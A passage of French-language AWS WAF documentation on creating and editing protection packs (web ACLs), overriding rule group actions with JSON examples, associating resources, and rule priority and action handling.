   Si vous souhaitez personnaliser l'action par défaut, choisissez les options correspondantes et renseignez les détails de votre personnalisation. Pour de plus amples informations, veuillez consulter [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

1. Vous pouvez définir une **liste de domaines de jetons** pour permettre le partage de jetons entre les applications protégées. Les jetons sont utilisés par les Challenge actions CAPTCHA et par l'intégration des applications SDKs que vous implémentez lorsque vous utilisez les groupes de règles AWS gérées pour la création de comptes AWS WAF Fraud Control, la prévention des fraudes (ACFP), la prévention du rachat de comptes AWS WAF Fraud Control (ATP) et le contrôle des AWS WAF bots. 

   Les suffixes publics ne sont pas autorisés. Par exemple, vous ne pouvez pas utiliser `gov.au` ou en `co.uk` tant que domaine de jetons.

   Par défaut, AWS WAF accepte les jetons uniquement pour le domaine de la ressource protégée. Si vous ajoutez des domaines de jetons dans cette liste, AWS WAF les jetons sont acceptés pour tous les domaines de la liste et pour le domaine de la ressource associée. Pour de plus amples informations, veuillez consulter [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists).

1. Choisissez **Suivant**.

1. Sur la page **Définir la priorité des règles**, sélectionnez et déplacez vos règles et groupes de règles dans l'ordre dans lequel vous AWS WAF souhaitez les traiter. AWS WAF traite les règles en commençant par le haut de la liste. Lorsque vous enregistrez, l'ACL Web AWS WAF attribue des paramètres de priorité numériques aux règles, dans l'ordre dans lequel vous les avez listés. Pour de plus amples informations, veuillez consulter [Définition de la priorité des règles](web-acl-processing-order.md). 

1. Choisissez **Suivant**.

1. Sur la page **Configurer les métriques**, passez en revue les options et appliquez les mises à jour dont vous avez besoin. Vous pouvez combiner des métriques provenant de plusieurs sources en leur attribuant le même **nom de CloudWatch métrique**. 

1. Choisissez **Suivant**.

1. Dans la page **Réviser et créer une liste ACL web**, vérifiez vos définitions. Si vous souhaitez modifier une zone, choisissez **Modifier** pour la zone. Vous êtes alors renvoyé à la page de l'Assistant ACL web. Effectuez les modifications, puis choisissez **Suivant** dans les pages jusqu'à ce que vous reveniez à la page **Réviser et créer une liste ACL web**.

1. Sélectionnez **Create web ACL**. Votre nouvelle ACL Web est répertoriée **sur la ACLs page Web**.

------

# Modification d'un pack de protection (ACL Web) dans AWS WAF
<a name="web-acl-editing"></a>

------
#### [ Using the new console ]

Cette section décrit les procédures permettant de modifier les packs de protection (Web ACLs) via la AWS console. 

Pour ajouter ou supprimer des règles dans un pack de protection (ACL Web) ou modifier les paramètres de configuration, accédez au pack de protection (ACL Web) en suivant la procédure décrite sur cette page. Lors de la mise à jour d'un pack de protection (ACL Web), AWS WAF fournit une couverture continue aux ressources que vous avez associées au pack de protection (ACL Web). 

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre pack de protection (ACL Web) pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte en fonction de votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

**Pour modifier un pack de protection (ACL Web)**

1. Connectez-vous à la nouvelle version AWS Management Console et ouvrez la AWS WAF console à l'adresse [https://console.aws.amazon.com/wafv2-pro.](https://console.aws.amazon.com/wafv2-pro) 

1. Dans le volet de navigation, sélectionnez **Resources & protection packs (web ACLs)**.

1. Choisissez le pack de protection (ACL Web) que vous souhaitez modifier. La console permet de modifier la carte du pack de protection principal (ACL Web) et ouvre également un volet latéral contenant des informations que vous pouvez modifier.

1. Modifiez le pack de protection (ACL Web) selon vos besoins. 

   La liste suivante répertorie les composants de configuration du pack de protection modifiable (ACL Web). 

   Cette section décrit les procédures permettant de modifier le Web ACLs via la AWS console. 

   Pour ajouter ou supprimer des règles dans une ACL Web ou modifier les paramètres de configuration, accédez à l'ACL Web en suivant la procédure décrite sur cette page. Lors de la mise à jour d'une ACL Web, AWS WAF fournit une couverture continue aux ressources que vous avez associées à l'ACL Web. 

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre ACL Web pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte en fonction de votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Une fois que vous avez modifié le paramètre d'une action de règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

------
#### [ Using the standard console ]

Cette section décrit les procédures permettant de modifier le Web ACLs via la AWS console. 

Pour ajouter ou supprimer des règles dans une ACL Web ou modifier les paramètres de configuration, accédez à l'ACL Web en suivant la procédure décrite sur cette page. Lors de la mise à jour d'une ACL Web, AWS WAF fournit une couverture continue aux ressources que vous avez associées à l'ACL Web. 

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre ACL Web pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte en fonction de votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

**Pour modifier une liste ACL web**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Web ACLs**.

1. Choisissez le nom de la liste ACL web que vous voulez modifier. La console vous amène à la description de l'ACL Web. 

1. Modifiez l'ACL Web selon vos besoins. Sélectionnez les onglets correspondant aux zones de configuration qui vous intéressent et modifiez les paramètres modifiables. Pour chaque paramètre que vous modifiez, lorsque vous choisissez **Enregistrer** et que vous revenez à la page de description de l'ACL Web, la console enregistre vos modifications dans l'ACL Web. 

   Vous trouverez ci-dessous la liste des onglets contenant les composants de configuration de l'ACL Web. 
   + **Onglet** Règles
     + **Règles définies dans l'ACL Web** — Vous pouvez modifier et gérer les règles que vous avez définies dans l'ACL Web, de la même manière que vous l'avez fait lors de la création de l'ACL Web. 
**Note**  
Ne modifiez pas le nom des règles que vous n'avez pas ajoutées manuellement à votre ACL Web. Si vous utilisez d'autres services pour gérer les règles à votre place, le fait de changer leur nom pourrait supprimer ou diminuer leur capacité à fournir les protections prévues. AWS Shield Advanced et AWS Firewall Manager les deux peuvent créer des règles dans votre ACL Web. Pour plus d'informations, consultez [Reconnaissance des groupes de règles fournis par d'autres services](waf-service-owned-rule-groups.md).
**Note**  
Si vous modifiez le nom d'une règle et que vous souhaitez que le nom de la métrique de la règle reflète le changement, vous devez également mettre à jour le nom de la métrique. AWS WAF ne met pas automatiquement à jour le nom de la métrique d'une règle lorsque vous modifiez le nom de la règle. Vous pouvez modifier le nom de la métrique lorsque vous modifiez la règle dans la console, à l'aide de l'éditeur JSON de règles. Vous pouvez également modifier les deux noms via APIs et dans toute liste JSON que vous utilisez pour définir votre pack de protection (ACL Web) ou votre groupe de règles.

       Pour plus d'informations sur les règles et les paramètres des groupes de règles, reportez-vous [AWS WAF règles](waf-rules.md) aux sections et[AWS WAF groupes de règles](waf-rule-groups.md).
     + **unités de capacité de la règle ACL Web utilisées** : utilisation actuelle de la capacité de votre ACL Web. Il s'agit d'une vue uniquement. 
     + **Action ACL Web par défaut pour les demandes qui ne correspondent à aucune règle** — Pour plus d'informations sur ce paramètre, consultez[Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF](web-acl-default-action.md). 
     + **Configurations de CAPTCHA et de défi ACL Web** : ces durées d'immunité déterminent la durée de validité d'un CAPTCHA ou d'un jeton de défi après son acquisition. Vous ne pouvez modifier ce paramètre ici qu'après avoir créé l'ACL Web. Pour plus d'informations sur ces paramètres, consultez [Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF](waf-tokens-immunity-times.md).
     + **Liste de domaines de jetons** : AWS WAF accepte les jetons pour tous les domaines de la liste et pour le domaine de la ressource associée. Pour de plus amples informations, veuillez consulter [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists).
   + ** AWS Onglet Ressources associées**
     + **Limite de taille d'inspection des requêtes Web** : incluse uniquement pour les sites Web ACLs qui protègent les CloudFront distributions. La limite de taille limite pour l'inspection de la carrosserie détermine la quantité de composant de carrosserie à AWS WAF envoyer pour inspection. Pour en savoir plus sur ce paramètre, consultez [Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF](web-acl-setting-body-inspection-limit.md).
     + ** AWS Ressources associées** : liste des ressources auxquelles l'ACL Web est actuellement associée et qu'elle protège. Vous pouvez localiser des ressources situées dans la même région que l'ACL Web et les associer à l'ACL Web. Pour de plus amples informations, veuillez consulter [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md).
   + Onglet **corps de réponse personnalisés**
     + Corps de réponse personnalisés pouvant être utilisés par vos règles ACL Web dont l'action est définie surBlock. Pour de plus amples informations, veuillez consulter [Envoi de réponses personnalisées pour les Block actions](customizing-the-response-for-blocked-requests.md).
   + **Onglet Journalisation et statistiques**
     + **Journalisation** : journalisation du trafic évalué par l'ACL Web. Pour plus d'informations, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).
     + **Intégration à Security Lake** : état de toute collecte de données que vous avez configurée pour l'ACL Web dans Amazon Security Lake. Pour plus d'informations, consultez la section [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) dans le *guide de l'utilisateur d'Amazon Security Lake*. 
     + **Exemples de demandes** : informations sur les règles qui correspondent aux requêtes Web. Pour plus d'informations sur l'affichage des exemples de demandes, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md).
     + **Paramètres de protection des données** — Vous pouvez configurer la rédaction et le filtrage des données de trafic Web pour toutes les données disponibles pour l'ACL Web et uniquement pour les données AWS WAF envoyées à la destination de journalisation de l'ACL Web configurée. Pour plus d'informations sur la protection des données, consultez[Protection des données et journalisation pour le trafic du pack de AWS WAF protection (ACL Web)](waf-data-protection-and-logging.md). 
     + **CloudWatch métriques** — Mesures relatives aux règles de votre ACL Web. Pour plus d'informations sur CloudWatch les métriques Amazon, consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Une fois que vous avez modifié le paramètre d'une action de règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

------

# Gestion du comportement des groupes de règles
<a name="web-acl-rule-group-settings"></a>

Cette section décrit les options qui s'offrent à vous pour modifier la façon dont vous utilisez un groupe de règles dans votre pack de protection (ACL Web). Ces informations s'appliquent à tous les types de groupe de règles. Après avoir ajouté un groupe de règles à un pack de protection (ACL Web), vous pouvez remplacer les actions des règles individuelles du groupe de règles par tout autre paramètre Count d'action de règle valide. Vous pouvez également annuler l'action résultante du groupe de règlesCount, ce qui n'a aucun effet sur la manière dont les règles sont évaluées au sein du groupe de règles. 

Pour de plus amples informations sur ces options, consultez [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md).

## Remplacer les actions des règles dans un groupe de règles
<a name="web-acl-rule-group-rule-action-override"></a>

Pour chaque groupe de règles d'un pack de protection (ACL Web), vous pouvez remplacer les actions de la règle contenue pour certaines ou toutes les règles. 

Le cas d'utilisation le plus courant consiste à remplacer les actions des règles pour tester de Count nouvelles règles ou des règles mises à jour. Si les métriques sont activées, vous recevez des métriques pour chaque règle que vous remplacez. Pour plus d’informations sur les tests, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

Vous pouvez apporter ces modifications lorsque vous ajoutez un groupe de règles géré au pack de protection (ACL Web), et vous pouvez les appliquer à n'importe quel type de groupe de règles lorsque vous modifiez le pack de protection (ACL Web). Ces instructions concernent un groupe de règles qui a déjà été ajouté au pack de protection (ACL Web). Consultez des informations supplémentaires sur cette option à l'adresse[Les actions des règles du groupe de règles remplacent les actions](web-acl-rule-group-override-options.md#web-acl-rule-group-override-options-rules).

------
#### [ Using the new console ]

**Pour annuler les actions des règles dans un groupe de règles**

1. Choisissez le pack de protection (ACL Web) que vous souhaitez modifier. La console permet de modifier la carte du pack de protection principal (ACL Web) et ouvre également un panneau latéral contenant des informations que vous pouvez modifier.

1. Dans la carte du pack de protection (ACL Web), cliquez sur le lien **Modifier** à côté de **Règles** pour ouvrir le panneau **Gérer les règles**.

1. Dans la section **Gérer les règles** du groupe de règles, choisissez la règle gérée pour ouvrir ses paramètres d'action.
   + **Remplacer le groupe de règles** : fait passer l'action du groupe de règles en mode Compte, mais toutes les actions de règles individuelles restent inchangées.
   + **Annuler toutes les actions de règle** : applique une action de règle à toutes les règles, en remplaçant leur état actuel.
   + Dérogation **d'une règle unique** : applique une action de règle à une règle individuelle.

1. Lorsque vous avez terminé d'apporter vos modifications, choisissez **Enregistrer la règle**. 

------
#### [ Using the standard console ]

**Pour annuler les actions des règles dans un groupe de règles**

1. Modifiez l'ACL Web. 

1. Dans l'onglet **Règles** de la page Web ACL, sélectionnez le groupe de règles, puis choisissez **Modifier**. 

1. Dans la section **Règles** du groupe de règles, gérez les paramètres d'action selon vos besoins. 
   + **Toutes les règles** : pour définir une action de dérogation pour toutes les règles du groupe de règles, ouvrez le menu déroulant Annuler **toutes les actions de règles et sélectionnez l'action de dérogation**. Pour supprimer les dérogations pour toutes les règles, sélectionnez **Supprimer toutes les dérogations**. 
   + **Règle unique** : pour définir une action de dérogation pour une seule règle, ouvrez le menu déroulant de la règle et sélectionnez l'action de dérogation. Pour supprimer une dérogation pour une règle, ouvrez le menu déroulant de la règle et sélectionnez **Supprimer** la dérogation.

1. Lorsque vous avez terminé d'apporter vos modifications, choisissez **Enregistrer la règle**. Les paramètres d'action de règle et d'action de remplacement sont répertoriés sur la page du groupe de règles. 

------

L'exemple de liste JSON suivant montre une déclaration de groupe de règles dans un pack de protection (ACL Web) qui remplace les actions des règles par Count les règles `CategoryVerifiedSearchEngine` et`CategoryVerifiedSocialMedia`. Dans le JSON, vous pouvez annuler toutes les actions des règles en fournissant une `RuleActionOverrides` entrée pour chaque règle individuelle.

```
{
    "Name": "AWS-AWSBotControl-Example",
   "Priority": 5, 
   "Statement": {
    "ManagedRuleGroupStatement": {
        "VendorName": "AWS",
        "Name": "AWSManagedRulesBotControlRuleSet",
        "RuleActionOverrides": [
          {
            "ActionToUse": {
              "Count": {}
            },
            "Name": "CategoryVerifiedSearchEngine"
          },
          {
            "ActionToUse": {
              "Count": {}
            },
            "Name": "CategoryVerifiedSocialMedia"
          }
        ],
        "ExcludedRules": []
    },
   "VisibilityConfig": {
       "SampledRequestsEnabled": true,
       "CloudWatchMetricsEnabled": true,
       "MetricName": "AWS-AWSBotControl-Example"
   }
}
```

## Remplacer le résultat de l'évaluation d'un groupe de règles par Count
<a name="web-acl-rule-group-action-override"></a>

Vous pouvez annuler l'action qui résulte de l'évaluation d'un groupe de règles, sans modifier la façon dont les règles du groupe de règles sont configurées ou évaluées. Cette option n'est pas couramment utilisée. Si l'une des règles du groupe de règles aboutit à une correspondance, cette dérogation définit l'action résultante du groupe de règles surCount.

**Note**  
Il s'agit d'un cas d'utilisation peu courant. La plupart des remplacements d'actions sont effectués au niveau de la règle, au sein du groupe de règles, comme décrit dans[Remplacer les actions des règles dans un groupe de règles](#web-acl-rule-group-rule-action-override).

Vous pouvez annuler l'action résultante du groupe de règles dans le pack de protection (ACL Web) lorsque vous ajoutez ou modifiez le groupe de règles. Dans la console, ouvrez le volet **facultatif de l'action Remplacer le groupe de règles du groupe** de règles et activez le remplacement. Dans le JSON défini `OverrideAction` dans l'instruction du groupe de règles, comme indiqué dans l'exemple de liste suivant : 

```
{
   "Name": "AWS-AWSBotControl-Example",
   "Priority": 5,  
   "Statement": {
    "ManagedRuleGroupStatement": {
     "VendorName": "AWS",
     "Name": "AWSManagedRulesBotControlRuleSet"
     }
   },
    "OverrideAction": {
       "Count": {}
    },
   "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AWS-AWSBotControl-Example"
   }
}
```

# Associer ou dissocier une protection à une ressource AWS
<a name="web-acl-associating-aws-resource"></a>

Vous pouvez l'utiliser AWS WAF pour créer les associations suivantes entre les packs de protection (Web ACLs) et vos ressources : 
+ Associez un pack de protection régional (ACL Web) à l'une des ressources régionales répertoriées ci-dessous. Pour cette option, le pack de protection (ACL Web) doit se trouver dans la même région que votre ressource. 
  + API REST Amazon API Gateway
  + Application Load Balancer
  + AWS AppSync API GraphQL
  + Groupe d’utilisateurs Amazon Cognito
  + AWS App Runner service
  + AWS Instance d'accès vérifié
  + AWS Amplify
+ Associez un pack de protection global (ACL Web) à une CloudFront distribution Amazon. Le pack de protection mondial (ACL Web) comportera une région codée en dur pour la région de l'est des États-Unis (Virginie du Nord).

Vous pouvez également associer un pack de protection (ACL Web) à une CloudFront distribution lorsque vous créez ou mettez à jour la distribution elle-même. Pour plus d'informations, consultez la section [Utiliser AWS WAF pour contrôler l'accès à votre contenu](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-awswaf.html) dans le manuel *Amazon CloudFront Developer Guide*.

**Restrictions sur les associations multiples**  
Vous pouvez associer un pack de protection unique (ACL Web) à une ou plusieurs AWS ressources, conformément aux restrictions suivantes :
+ Vous ne pouvez associer chaque AWS ressource qu'à un seul pack de protection (ACL Web). La relation entre le pack de protection (ACL Web) et AWS les ressources est one-to-many. 
+ Vous pouvez associer un pack de protection (ACL Web) à une ou plusieurs CloudFront distributions. Vous ne pouvez associer un pack de protection (ACL Web) que vous avez associé à une CloudFront distribution à aucun autre type de AWS ressource.

**Restrictions supplémentaires**  
Les restrictions supplémentaires suivantes s'appliquent aux associations de packs de protection (ACL Web) : 
+ Vous ne pouvez associer un pack de protection (ACL Web) qu'à un Application Load Balancer qu'il contient. Régions AWS Par exemple, vous ne pouvez pas associer un pack de protection (ACL Web) à un Application Load Balancer activé. AWS Outposts
+ Vous ne pouvez pas associer un groupe d'utilisateurs Amazon Cognito à un pack de protection (ACL Web) qui utilise le groupe de règles géré AWS WAF Fraud Control pour la prévention de la fraude (ACFP) `AWSManagedRulesACFPRuleSet` ou le groupe de règles géré AWS WAF contre le rachat de comptes Fraud Control (ATP). `AWSManagedRulesATPRuleSet` Pour plus d'informations sur la prévention de la fraude lors de la création de comptes, consultez[AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)](waf-acfp.md). Pour plus d'informations sur la prévention du piratage de compte, consultez[AWS WAF Contrôle des fraudes et prévention des prises de contrôle des comptes (ATP)](waf-atp.md). 

**Risque lié au trafic de production**  
Avant de déployer votre pack de protection (ACL Web) pour le trafic de production, testez-le et ajustez-le dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles en mode comptage avec votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

# Associer une protection à une AWS ressource
<a name="web-acl-associating"></a>

------
#### [ Using the new console ]

1. Choisissez le pack de protection (ACL Web) que vous souhaitez modifier. La console permet de modifier la carte du pack de protection principal (ACL Web) et ouvre également un panneau latéral contenant des informations que vous pouvez modifier.

1. Sur la carte du pack de protection (ACL Web), cliquez sur le lien **Modifier** à côté de **Ressources** pour ouvrir le panneau **Gérer les ressources**.

1. Dans la section **Gérer les ressources** du groupe de règles, sélectionnez **Ajouter des ressources régionales** ou **Ajouter des ressources globales**.

1. Choisissez des ressources, puis cliquez sur **Ajouter**.

------
#### [ Using the standard console ]

Pour associer une ACL Web à une AWS ressource, effectuez la procédure suivante.

**Pour associer une ACL Web à une AWS ressource**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Web ACLs**.

1. Choisissez le nom de l'ACL Web que vous souhaitez associer à une ressource. La console vous amène à la description de la liste ACL web, où vous pouvez la modifier.

1. Dans l'onglet ** AWS Ressources associées**, choisissez **Ajouter AWS des ressources**.

1. Lorsque vous y êtes invité, choisissez le type de ressource, sélectionnez le bouton radio à côté de la ressource que vous souhaitez associer, puis choisissez **Ajouter**. 

------

# Dissociation d'une protection d'une ressource AWS
<a name="web-acl-dissociating-aws-resource"></a>

------
#### [ Using the new console ]

1. Choisissez le pack de protection (ACL Web) que vous souhaitez modifier. La console permet de modifier la carte du pack de protection principal (ACL Web) et ouvre également un panneau latéral contenant des informations que vous pouvez modifier.

1. Sur la carte du pack de protection (ACL Web), cliquez sur le lien **Modifier** à côté de **Ressources** pour ouvrir le panneau **Gérer les ressources**.

1. Dans la section **Gérer les ressources** du groupe de règles, choisissez la ressource que vous souhaitez dissocier, puis choisissez **Dissocier**.
**Note**  
Vous devez dissocier une ressource à la fois. Ne choisissez pas plusieurs ressources. 

1. Sur la page de confirmation, tapez « dissocier », puis choisissez **Dissocier**.

------
#### [ Using the standard console ]

Pour dissocier une ACL Web d'une AWS ressource, effectuez la procédure suivante.

**Pour dissocier une ACL Web d'une ressource AWS**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, sélectionnez **Web ACLs**.

1. Choisissez le nom de l'ACL Web que vous souhaitez dissocier de votre ressource. La console vous amène à la description de la liste ACL web, où vous pouvez la modifier.

1. Dans l'onglet ** AWS Ressources associées**, sélectionnez la ressource dont vous souhaitez dissocier cette ACL Web. 
**Note**  
Vous devez dissocier une ressource à la fois. Ne choisissez pas plusieurs ressources. 
**Note**  
Lorsque vous choisissez d'associer un Application Load Balancer à votre WebACL, la protection S **au niveau des ressources DDo** est activée. Pour de plus amples informations, veuillez consulter [AWS WAF Prévention du déni de service distribué (DDoS)](waf-anti-ddos.md).

1. Choisissez **Dissocier**. La console ouvre une boîte de dialogue de confirmation. Confirmez votre choix de dissocier l'ACL Web de la AWS ressource. 

------

# Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF
<a name="web-acl-processing"></a>

Cette section explique comment les packs de protection (Web ACLs) et Web ACLs fonctionnent avec les règles et les groupes de règles.

La façon dont un pack de protection (ACL Web) gère une requête Web dépend des éléments suivants : 
+ Les paramètres de priorité numérique des règles du pack de protection (ACL Web) et des groupes de règles internes
+ Les paramètres d'action sur les règles et le pack de protection (ACL Web)
+ Toutes les dérogations que vous apportez aux règles des groupes de règles que vous ajoutez

Pour obtenir la liste des paramètres d'action des règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). 

Vous pouvez personnaliser le traitement des demandes et des réponses dans les paramètres d'action de vos règles et dans les paramètres d'action du pack de protection par défaut (Web ACL). Pour plus d'informations, consultez [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

**Topics**
+ [Définition de la priorité des règles](web-acl-processing-order.md)
+ [Comment AWS WAF gère les actions des règles et des groupes de règles](web-acl-rule-actions.md)
+ [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md)

# Définition de la priorité des règles
<a name="web-acl-processing-order"></a>

Cette section explique comment AWS WAF utiliser les paramètres de priorité numériques pour définir l'ordre d'évaluation des règles.

Dans un pack de protection (ACL Web) et au sein de n'importe quel groupe de règles, vous déterminez l'ordre d'évaluation des règles à l'aide de paramètres de priorité numériques. Vous devez attribuer à chaque règle d'un pack de protection (ACL Web) un paramètre de priorité unique au sein de ce pack de protection (ACL Web), et vous devez attribuer à chaque règle d'un groupe de règles un paramètre de priorité unique au sein de ce groupe de règles. 

**Note**  
Lorsque vous gérez des groupes de règles, les packs de protection (Web ACLs) via la console vous AWS WAF attribuent des paramètres de priorité numériques uniques en fonction de l'ordre des règles dans la liste. AWS WAF assigne la priorité numérique la plus faible à la règle en haut de la liste et la priorité numérique la plus élevée à la règle en bas. 

Lorsqu'il AWS WAF évalue un groupe de règles, le pack de protection (ACL Web) par rapport à une requête Web, il évalue les règles à partir du paramètre de priorité numérique le plus bas jusqu'à ce qu'il trouve une correspondance mettant fin à l'évaluation ou épuisant toutes les règles.

Supposons, par exemple, que votre pack de protection (ACL Web) comporte les règles et groupes de règles suivants, classés par ordre de priorité comme indiqué ci-dessous :
+ Règle 1 — priorité 0
+ RuleGroupA — priorité 100
  + Règle A1 — priorité 10 000
  + Règle A2 — priorité 20 000
+ Règle 2 — priorité 200
+ RuleGroupB — priorité 300
  + Règle B1 — priorité 0
  + Règle B2 — priorité 1

AWS WAF évaluerait les règles de ce pack de protection (ACL Web) dans l'ordre suivant :
+ Règle 1
+ RuleGroupA. Règle A1
+ RuleGroupA. Règle A2
+ Règle 2
+ RuleGroupPar RuleB1
+ RuleGroupPar RuleB2

# Comment AWS WAF gère les actions des règles et des groupes de règles
<a name="web-acl-rule-actions"></a>

Cette section explique comment AWS WAF utiliser les règles et les groupes de règles pour gérer les actions.

Lorsque vous configurez vos règles et vos groupes de règles, vous choisissez la manière dont vous AWS WAF souhaitez gérer les requêtes Web correspondantes : 
+ **Allowet Block mettent fin à des actions**, Allow et les Block actions arrêtent tout autre traitement du pack de protection (ACL Web) sur la requête Web correspondante. Si une règle d'un pack de protection (ACL Web) trouve une correspondance pour une demande et que l'action de la règle est Allow ou Block que cette correspondance détermine la disposition finale de la demande Web pour le pack de protection (ACL Web). AWS WAF ne traite aucune autre règle du pack de protection (ACL Web) qui vient après celle correspondante. Cela est vrai pour les règles que vous ajoutez directement au pack de protection (ACL Web) et pour les règles qui se trouvent dans un groupe de règles ajouté. Avec cette Block action, la ressource protégée ne reçoit ni ne traite la demande Web.
+ **Countest une action sans fin :** lorsqu'une règle comportant une Count action correspond à une demande, AWS WAF compte la demande, puis poursuit le traitement des règles qui suivent dans l'ensemble de règles du pack de protection (ACL Web). 
+ **CAPTCHAet il Challenge peut s'agir d'actions non résiliantes ou résilientes** : lorsqu'une règle comportant l'une de ces actions correspond à une demande, AWS WAF vérifie le statut de son jeton. Si la demande contient un jeton valide, AWS WAF traite la correspondance comme une Count correspondance, puis poursuit le traitement des règles qui suivent dans l'ensemble de règles du pack de protection (ACL Web). Si la demande ne contient pas de jeton valide, AWS WAF met fin à l'évaluation et envoie au client un casse-tête CAPTCHA ou un défi de session client en arrière-plan silencieux à résoudre. 

